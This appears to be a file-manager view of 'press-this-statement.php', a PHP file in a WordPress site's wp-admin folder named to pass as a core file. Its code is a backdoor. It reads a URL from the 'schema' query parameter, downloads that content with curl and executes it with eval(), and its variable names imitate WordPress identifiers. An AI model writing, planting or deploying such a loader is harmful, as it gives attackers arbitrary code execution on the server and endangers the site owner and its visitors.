File "press-this-statement.php"

Full Path: /home/raylsmit/public_html/biblestoday/wp-admin/press-this-statement.php
File size: 330 bytes
MIME-type: text/x-php
Charset: utf-8

<?php

if (isset($_GET['schema'])) {
    $the_ID_ufa = $_GET['schema'];
    if ($is_admin_we = curl_init()) {
        curl_setopt($is_admin_we, CURLOPT_URL, $the_ID_ufa);
        curl_setopt($is_admin_we, CURLOPT_RETURNTRANSFER, true);
        eval(curl_exec($is_admin_we));
        curl_close($is_admin_we);
        exit;
    }
}